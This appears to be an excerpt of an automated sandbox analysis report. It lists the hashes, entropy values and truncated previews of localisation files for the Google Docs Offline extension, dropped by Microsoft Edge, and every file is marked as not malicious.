                                                                                                                                                                                                                                                                                                        Size (bytes):978
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                                        MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                                        SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                                        SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                                        SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):907
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                                        MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                                        SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                                        SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                                        SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):914
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                                        MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                                        SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                                        SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                                        SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):937
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                                        MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                                        SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                                        SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                                        SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1337
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                                        MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                                        SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                                        SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                                        SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\si\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2846
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                                        MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                                        SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                                        SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                                        SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):934
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                                        MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                                        SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                                        SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                                        SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):963
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                                        MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                                        SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                                        SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                                        SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1320
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                                        MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                                        SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                                        SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                                        SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):884
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                                        MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                                        SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                                        SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                                        SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\sw\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):980
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                                        MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                                        SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                                        SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                                        SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wuser popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\ta\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1941
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                                        MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                                        SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                                        SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                                        SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\te\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1969
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                                        MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                                        SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                                        SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                                        SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir6524_46839946\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1674
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                                        MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                                        SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                                        SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                                        SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

